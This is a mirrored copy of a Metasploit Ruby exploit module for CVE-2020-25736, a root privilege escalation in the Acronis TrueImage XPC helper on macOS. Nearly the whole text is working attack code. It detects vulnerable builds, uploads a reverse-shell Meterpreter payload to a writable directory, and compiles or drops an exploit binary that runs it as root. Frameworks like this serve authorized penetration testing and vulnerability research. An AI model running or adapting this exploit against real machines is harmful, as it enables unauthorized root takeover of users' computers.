CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/osx/local/acronis_trueimage_xpc_privesc.rb
Views: 11784
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Local

7
  Rank = ExcellentRanking

8


9
  include Msf::Post::File

10
  include Msf::Post::Common

11
  include Msf::Post::Process

12
  include Msf::Exploit::EXE

13
  include Msf::Exploit::FileDropper

14
  prepend Msf::Exploit::Remote::AutoCheck

15


16
  def initialize(info = {})

17
    super(

18
      update_info(

19
        info,

20
        'Name' => 'Acronis TrueImage XPC Privilege Escalation',

21
        'Description' => %q{

22
          Acronis TrueImage versions 2019 update 1 through 2021 update 1

23
          are vulnerable to privilege escalation. The `com.acronis.trueimagehelper`

24
          helper tool does not perform any validation on connecting clients,

25
          which gives arbitrary clients the ability to execute functions provided

26
          by the helper tool with `root` privileges.

27
        },

28
        'License' => MSF_LICENSE,

29
        'Author' => [

30
          'Csaba Fitzl', # @theevilbit - Vulnerability Discovery

31
          'Shelby Pace' # Metasploit Module and Objective-c code

32
        ],

33
        'Platform' => [ 'osx' ],

34
        'Arch' => [ ARCH_X64 ],

35
        'SessionTypes' => [ 'shell', 'meterpreter' ],

36
        'Targets' => [[ 'Auto', {} ]],

37
        'Privileged' => true,

38
        'References' => [

39
          [ 'CVE', '2020-25736' ],

40
          [ 'URL', 'https://kb.acronis.com/content/68061' ],

41
          [ 'URL', 'https://attackerkb.com/topics/a1Yrvagxt5/cve-2020-25736' ]

42
        ],

43
        'DefaultOptions' => {

44
          'PAYLOAD' => 'osx/x64/meterpreter/reverse_tcp',

45
          'WfsDelay' => 15

46
        },

47
        'DisclosureDate' => '2020-11-11',

48
        'DefaultTarget' => 0,

49
        'Notes' => {

50
          'Stability' => [ CRASH_SAFE ],

51
          'Reliability' => [ REPEATABLE_SESSION ],

52
          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ]

53
        }

54
      )

55
    )

56


57
    register_options([

58
      OptString.new('WRITABLE_DIR', [ true, 'Writable directory to write the payload to', '/tmp' ]),

59
      OptString.new('SHELL', [ true, 'Shell to use for executing payload', '/bin/zsh' ]),

60
      OptEnum.new('COMPILE', [ true, 'Compile exploit on target', 'Auto', [ 'Auto', 'True', 'False' ] ])

61
    ])

62
  end

63


64
  def tmp_dir

65
    datastore['WRITABLE_DIR'].to_s

66
  end

67


68
  def sys_shell

69
    datastore['SHELL'].to_s

70
  end

71


72
  def compile

73
    datastore['COMPILE']

74
  end

75


76
  def compile_on_target?

77
    return false if compile == 'False'

78


79
    if compile == 'Auto'

80
      ret = cmd_exec('xcode-select -p')

81
      return false if ret.include?('error: unable')

82
    end

83


84
    true

85
  end

86


87
  def exp_file_name

88
    @exp_file_name ||= Rex::Text.rand_text_alpha(5..10)

89
  end

90


91
  def check

92
    helper_location = '/Library/PrivilegedHelperTools'

93
    helper_svc_names = [ 'com.acronis.trueimagehelper', 'com.acronis.helpertool' ]

94
    plist = '/Applications/Acronis True Image.app/Contents/Info.plist'

95


96
    unless helper_svc_names.any? { |svc_name| file?("#{helper_location}/#{svc_name}") }

97
      return CheckCode::Safe

98
    end

99


100
    return CheckCode::Detected('Service found, but cannot determine version via plist') unless file?(plist)

101


102
    plutil_cmd = "plutil -extract CFBundleVersion raw \'#{plist}\'"

103
    build_no = cmd_exec(plutil_cmd)

104
    return CheckCode::Detected('Could not retrieve build number from plist') if build_no.blank?

105


106
    build_no = build_no.to_i

107
    vprint_status("Found build #{build_no}")

108
    return CheckCode::Appears('Vulnerable build found') if build_no > 14170 && build_no < 33610

109


110
    CheckCode::Safe('Acronis version found is not vulnerable')

111
  end

112


113
  def exploit

114
    payload_name = Rex::Text.rand_text_alpha(7)

115
    @payload_path = "#{tmp_dir}/#{payload_name}"

116


117
    print_status("Attempting to write payload at #{@payload_path}")

118
    unless upload_and_chmodx(@payload_path, generate_payload_exe)

119
      fail_with(Failure::BadConfig, 'Failed to write payload. Consider changing WRITABLE_DIR option.')

120
    end

121
    vprint_good("Successfully wrote payload at #{@payload_path}")

122


123
    @pid = get_valid_pid

124
    exp_bin_path = "#{tmp_dir}/#{exp_file_name}"

125


126
    if compile_on_target?

127
      exp_src = "#{exp_file_name}.m"

128
      exp_path = "#{tmp_dir}/#{exp_src}"

129
      compile_cmd = "gcc -framework Foundation #{exp_path} -o #{exp_bin_path}"

130


131
      unless write_file(exp_path, objective_c_code)

132
        fail_with(Failure::BadConfig, 'Failed to write Objective-C exploit to disk. WRITABLE_DIR may need to be changed')

133
      end

134
      register_files_for_cleanup(@payload_path, exp_path, exp_bin_path)

135


136
      ret = cmd_exec(compile_cmd)

137
      fail_with(Failure::UnexpectedReply, "Failed to compile #{exp_src}") unless ret.blank?

138


139
      print_status("Successfully compiled #{exp_src}...Now executing payload")

140
    else

141
      print_status("Using pre-compiled exploit #{exp_bin_path}")

142
      compiled_exploit = compiled_exp

143
      unless upload_and_chmodx(exp_bin_path, compiled_exploit)

144
        fail_with(Failure::BadConfig, 'Failed to write compiled exploit. Consider changing WRITABLE_DIR option.')

145
      end

146


147
      register_files_for_cleanup(exp_bin_path, @payload_path)

148
    end

149


150
    cmd_exec(exp_bin_path)

151
  end

152


153
  def objective_c_code

154
    file_contents = exploit_data('CVE-2020-25736', 'acronis-exp.erb')

155
    ERB.new(file_contents).result(binding)

156
  rescue Errno::ENOENT

157
    fail_with(Failure::NotFound, 'ERB payload file not found')

158
  end

159


160
  def compiled_exp

161
    compiled = exploit_data('CVE-2020-25736', 'acronis-exp.macho')

162
    compiled.gsub!('/tmp/payload', @payload_path)

163
    compiled.gsub!('/bin/zsh', sys_shell)

164
    compiled.gsub!("\xEF\xBE\xAD\xDE".force_encoding('ASCII-8BIT'), [@pid.to_i].pack('V'))

165


166
    compiled

167
  end

168


169
  def get_valid_pid

170
    procs = get_processes

171
    return '1' if procs.empty?

172


173
    len = procs.length

174
    rand_proc = procs[rand(1...len)]

175
    return '1' if rand_proc['pid'].to_s.blank?

176


177
    rand_proc['pid'].to_s

178
  end

179
end

180


181